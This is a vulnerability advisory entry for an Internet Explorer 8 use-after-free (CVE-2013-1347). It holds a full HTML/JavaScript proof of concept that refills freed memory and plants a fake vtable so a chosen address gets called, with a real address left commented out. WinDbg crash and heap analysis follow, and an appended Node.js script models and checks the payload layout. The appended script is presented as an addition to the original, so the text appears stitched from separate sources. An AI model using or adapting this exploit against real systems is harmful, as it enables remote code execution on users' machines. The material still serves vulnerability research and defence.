[CNNVD] Microsoft Internet Explorer 8 Remote Code Execution vulnerability (cnnvd-201305-092)
Microsoft Internet Explorer is the web browser bundled by default with the Windows operating system, published by Microsoft Corporation (Microsoft) of the United States.
A remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been properly initialized or has been deleted. This can corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker could host a specially crafted website designed to exploit this vulnerability through Internet Explorer and then persuade a user to view the site.
Poc:
<!doctype html>
<HTML XMLNS:t="urn:schemas-microsoft-com:time">
<!-- HTML+TIME namespace import: standard IE boilerplate, reconstructed here because the t:animateColor element below is not a time element without it -->
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
<script>
function helloWorld()
{
    animvalues = "";
    // mshtml!CElement::Doc:
    //   6586c815 8b01      mov eax,dword ptr [ecx]
    //   6586c817 8b5070    mov edx,dword ptr [eax+70h]
    //   6586c81a ffd2      call edx
    for(i = 0; i <= 0x70/4; i++)
    {
        // The first value of the t:animateColor element becomes the first DWORD of the replaced object,
        // i.e. it overwrites the vtable pointer. The virtual function is fetched from offset 0x70 of the
        // vtable, so DWORD index 0x70/4 of this string is what ends up in edx.
        if(i == 0x70/4)
        {
            //animvalues += unescape("%u5ed5%u77c1");
            animvalues += unescape("%u4141%u4141");   // controls edx = 0x41414141
        }
        else
        {
            animvalues += unescape("%u4242%u4242");   // 0x42424242 filler
        }
    }
    for(i = 0; i < 13; i++)
    {
        // The t:animateColor values attribute is a semicolon-delimited string. The number of semicolons
        // determines the size of the object, and each element of the object is a pointer to one of the
        // delimited substrings. The vulnerable object, CGenericElement, is 0x4c bytes; the PoC uses 13
        // elements here to size the replacement to match.
        animvalues += ";red";
    }
    f0 = document.createElement('span');
    document.body.appendChild(f0);
    f1 = document.createElement('span');
    document.body.appendChild(f1);
    f2 = document.createElement('span');
    document.body.appendChild(f2);
    document.body.contentEditable = "true";
    f2.appendChild(document.createElement('datalist'));
    f1.appendChild(document.createElement('span'));
    f1.appendChild(document.createElement('table'));
    try {
        f0.offsetParent = null;
    } catch(e) {}
    f2.innerHTML = "";
    f0.appendChild(document.createElement('hr'));
    f1.innerHTML = "";
    CollectGarbage();
    try {
        // the t:animateColor element's contents can be set freely, which controls the object's size
        a = document.getElementById('myanim');
        a.values = animvalues;
    } catch(e) {}
}
</script>
<body onload="helloWorld()">
<t:animateColor id="myanim"/>
</body>
</HTML>

Opening the PoC produces the crash below, with page heap and heap allocation stack-trace recording enabled:
(4dc.8f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=66c25100 ebx=17a72fb0 ecx=09106fc8 edx=00000000 esi=045fedc8 edi=00000000
eip=668ac400 esp=045fed9c ebp=045fedb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
668ac400 8b01            mov     eax,dword ptr [ecx]  ds:0023:09106fc8=????????
Look at the surrounding assembly, shown below. It is clearly an object access: the first three instructions load the object's vtable pointer, index a virtual function from it, and call it. The crash is on the first instruction, the dereference of ecx.

1:017> u 668ac400
mshtml!CElement::Doc:
668ac400 8b01            mov     eax,dword ptr [ecx]
668ac402 8b5070          mov     edx,dword ptr [eax+70h]
668ac405 ffd2            call    edx
668ac407 8b400c          mov     eax,dword ptr [eax+0Ch]
668ac40a c3              ret
668ac40b 33c0            xor     eax,eax
668ac40d e9f7aeffff      jmp     mshtml!CAttrArray::PrivateFind+0x8f (668a7309)
668ac412 90              nop
Look at the memory at ecx, shown below: it is not accessible. So I just need to focus on what ecx is and where it came from.

1:017> dc ecx
09106fc8  ???????? ???????? ???????? ????????  ????????????????
09106fd8  ???????? ???????? ???????? ????????  ????????????????
09106fe8  ???????? ???????? ???????? ????????  ????????????????
09106ff8  ???????? ???????? ???????? ????????  ????????????????
09107008  ???????? ???????? ???????? ????????  ????????????????
09107018  ???????? ???????? ???????? ????????  ????????????????
09107028  ???????? ???????? ???????? ????????  ????????????????
09107038  ???????? ???????? ???????? ????????  ????????????????
Check whether ecx belongs to a heap, as shown below. It does, and according to the recorded heap allocation stack it is a block that has already been freed: an obvious use-after-free. Looking at which object this is, the free was done from CEventObj::`vector deleting destructor', so the problem seems to involve the CEventObj object.

1:017> !heap -p -a ecx
    address 09106fc8 found in
    _DPH_HEAP_ROOT @ 51000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7093c98:          9106000
        737e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
        77955674 ntdll!RtlDebugFreeHeap+0x0000002f
        77917aca ntdll!RtlpFreeHeap+0x0000005d
        778e2d68 ntdll!RtlFreeHeap+0x00000142
        76fff1ac kernel32!HeapFree+0x00000014
        668b7dfc mshtml!CEventObj::`vector deleting destructor'+0x00000022
        668b7dd0 mshtml!CBase::SubRelease+0x00000022
        668ab034 mshtml!PlainRelease+0x00000025
        69e398ea mstime!CEventMgr::_FireEvent+0x000001c0
        69dfd9db mstime!CTIMEElementBase::FireEvents+0x000000ce
        69dfb7c9 mstime!CTIMEElementBase::FireEvent+0x0000016e
        69e00521 mstime!MMBaseBvr::TEBvr::EventNotify+0x000000ac
        69e49379 mstime!EventDispatcher::DoIt+0x0000001c
        69e492bb mstime!Dispatch+0x00000083
        69e493b7 mstime!CNodeBvrList::DispatchEventNotify+0x00000035
        69e46f95 mstime!CEventData::CallEvent+0x00000021
        69e442a6 mstime!CTIMENodeMgr::Tick+0x000000ec
        69e00b05 mstime!MMPlayer::Tick+0x0000004a
        69e00b62 mstime!MMPlayer::OnTimer+0x00000036
        69df720e mstime!CTIMEBodyElement::StartRootTime+0x000000a2
        69df6ee4 mstime!CTIMEBodyElement::OnLoad+0x0000002f
        69dfd528 mstime!CTIMEElementBase::OnLoadEvent+0x0000001e
        69e39e54 mstime!CEventMgr::Invoke+0x00000230
        6690be60 mshtml!CBase::InvokeEvent+0x00000512
        668ff3f1 mshtml!COmWindowProxy::FireEvent+0x00000169
        66896a12 mshtml!COmWindowProxy::Fire_onload+0x000000d5
        66896dde mshtml!CMarkup::OnLoadStatusDone+0x0000040a
        66896aaf mshtml!CMarkup::OnLoadStatus+0x00000047
        66896fad mshtml!CProgSink::DoUpdate+0x00000549
        66824fab mshtml!CProgSink::OnMethodCall+0x00000012
        668c94b2 mshtml!GlobalWndOnMethodCall+0x000000ff
        668b37f7 mshtml!GlobalWndProc+0x0000010c
To verify this guess, let's look at how the UAF object is allocated and freed. Start by setting a breakpoint on the object's destructor, as follows.

1:017> x mshtml!CEventObj::`vector deleting destructor'
668b7dda          mshtml!CEventObj::`vector deleting destructor' = <no type information>
1:017> bl
 0 e 668b7dda     0001 (0001)  1:**** mshtml!CEventObj::`scalar deleting destructor'

Note that bl resolves the same address to the scalar deleting destructor: the vector and scalar destructor thunks share one address because the linker folded their identical code, so a breakpoint on either name hits the same place.
Reload the process, and don't forget to set .childdbg 1. It has to be set again on every run, which is annoying; I don't know how to make it persist.
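As an added example that is not part of the original PoC or this write-up, the following Node.js script models the values payload the PoC builds, so the layout reasoning in the PoC comments (fake vtable in the first semicolon-delimited element, call target at DWORD index 0x70/4, 13 filler elements) can be checked offline before loading anything into Internet Explorer. The helper names and the parsing model are this example's own assumptions: it simulates only the UTF-16 string layout and the three instructions of CElement::Doc, not IE's allocator or mstime's real attribute parser.

```javascript
// Added example, not the original PoC: model the t:animateColor "values"
// payload and decode it the way the x86 code in mshtml!CElement::Doc would.
// Function names (buildAnimValues, decodeDwords, simulateCElementDoc,
// checkLayout) are this example's own.

// Offset of the virtual-function slot fetched by mshtml!CElement::Doc:
//   mov eax,dword ptr [ecx]       ; eax = first DWORD of the replaced object
//   mov edx,dword ptr [eax+70h]   ; edx = DWORD at fake vtable + 0x70
//   call edx
const VTABLE_SLOT_OFFSET = 0x70;

// Encode a 32-bit little-endian DWORD as the two UTF-16 code units that
// unescape("%uLLLL%uHHHH") places in IE's string buffer (low half first,
// so %u4141%u4141 is the DWORD 0x41414141).
function dwordToUnits(dword) {
  return String.fromCharCode(dword & 0xffff, (dword >>> 16) & 0xffff);
}

// Decode a UTF-16 string back into unsigned DWORDs, as the CPU reads them.
function decodeDwords(str) {
  const out = [];
  for (let i = 0; i + 1 < str.length; i += 2) {
    out.push(((str.charCodeAt(i + 1) << 16) | str.charCodeAt(i)) >>> 0);
  }
  return out;
}

// Build the values string. Element 0 (everything before the first ';') is
// the fake vtable: filler DWORDs up to the slot index, then the call target
// at the slot index. The remaining elements are fillers; the PoC uses 13 of
// them to size the element-pointer array to the freed 0x4c-byte CGenericElement.
function buildAnimValues(slotValue, filler, elementCount, slotOffset = VTABLE_SLOT_OFFSET) {
  const slotIndex = slotOffset / 4;
  let s = "";
  for (let i = 0; i <= slotIndex; i++) {
    s += dwordToUnits(i === slotIndex ? slotValue : filler);
  }
  for (let i = 0; i < elementCount; i++) s += ";red";
  return s;
}

// Model mstime splitting the attribute into elements, then CElement::Doc
// reading the vtable slot out of element 0. Returns what would land in edx.
function simulateCElementDoc(values, slotOffset = VTABLE_SLOT_OFFSET) {
  const elements = values.split(";");
  const fakeVtable = decodeDwords(elements[0]);
  return fakeVtable[slotOffset / 4];
}

// Sanity-check the payload layout: element count, fake vtable size in bytes,
// and the value that would be called through.
function checkLayout(values, slotValue, elementCount, slotOffset = VTABLE_SLOT_OFFSET) {
  const elements = values.split(";");
  const fakeVtable = decodeDwords(elements[0]);
  const edx = fakeVtable[slotOffset / 4];
  return {
    elementCount: elements.length - 1,        // filler elements after element 0
    fakeVtableBytes: elements[0].length * 2,  // UTF-16 units * 2 = 0x74 for slot 0x70
    slotIndex: slotOffset / 4,
    edx: edx,
    ok: elements.length - 1 === elementCount && edx === slotValue,
  };
}

// Same parameters as the PoC: target 0x41414141, filler 0x42424242, 13 elements.
const values = buildAnimValues(0x41414141, 0x42424242, 13);
console.log(checkLayout(values, 0x41414141, 13));
```

Swapping the slot value for a real address (the commented-out %u5ed5%u77c1 in the PoC) changes only what simulateCElementDoc returns; the element count and the 0x74-byte fake vtable stay the same, which is the point of fixing the loop bound at 0x70/4.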
CVE-2013-1347 Microsoft Internet Explorer 8 Remote Code Execution vulnerability